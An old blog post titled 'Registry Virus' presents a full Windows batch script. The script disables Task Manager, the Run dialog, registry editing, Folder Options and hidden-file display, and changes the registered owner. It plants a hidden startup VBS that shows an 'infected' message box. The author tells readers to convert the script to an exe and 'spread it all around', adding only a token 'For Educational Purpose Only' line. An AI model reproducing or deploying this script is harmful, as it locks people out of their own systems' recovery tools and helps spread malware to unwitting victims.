Wednesday, July 1, 2009

Registry Virus



Most of the virus programmers disable some features of the registry like,
Disables the task manager…..Disables the Run…..etc.
Let’s take a look how do they done all these….
Here I’m making a bat file which will do all these…..it is easy to
Convert a bat file to exe using a bat to exe converter .
This bat file will disable Run, Registry editing, task manager, Folder options, hidden files/folders.
And it will produce a Error message whenever restarts the system….likeYour system infected
=======================================================================
ECHO REGEDIT4 > %WINDIR%\DXM.REG
echo. >> %WINDIR%\DXM.reg

echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] >> %WINDIR%\DXM.reg
echo "CheckedValue"=dword:0 >> %WINDIR%\DXM.reg

echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] >> %WINDIR%\DXM.reg
echo "CheckedValue"=dword:0 >> %WINDIR%\DXM.reg

echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:1 >> %WINDIR%\DXM.reg

echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:1 >> %WINDIR%\DXM.reg

echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableRegistryTools"=dword:1 >> %WINDIR%\DXM.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %WINDIR%\DXM.reg
echo "dxmv"="dxm.vbs" >> %WINDIR%\DXM.reg

echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoRun"=dword:1 >> %WINDIR%\DXM.reg

echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoRun"=dword:1 >> %WINDIR%\DXM.reg

echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoFolderOptions"=dword:1 >> %WINDIR%\DXM.reg

echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoFolderOptions"=dword:0 >> %WINDIR%\DXM.reg

echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion] >> %WINDIR%\DXM.reg
echo "RegisteredOwner"="Mr. AkhilDas” >> %WINDIR%\DXM.reg
echo "RegisteredOrganization"="«« AkhlD™ »»" >> %WINDIR%\DXM.reg

echo. >> %WINDIR%\dxm.vbs
echo dxm=msgbox("Your system infected by «« AkhlD™ »» virus ",16,"iam_kingston@iamcrazy.in") >> %windir%\dxm.vbs

attrib +h +s +r %WINDIR%\dxm.vbs

start /w regedit /s %WINDIR%\DXM.reg
del %WINDIR%\DXM.reg

==========================================================================
This script actually makes a dxm.reg file in the windows directory and also makes dxm.vbs file in there.
It disables all the above functions…and put the dxm.vbs in the start up.
Now convert it to an exe file……spread it all around You!.....Enjoy ! [;)]

For Educational Purpose Only !

1 comments:

Anonymous said...

I can't Believe it's work

Followers

The Daily Puppy

 
Design by Wordpress Theme | Bloggerized by Free Blogger Templates | JCPenney Coupons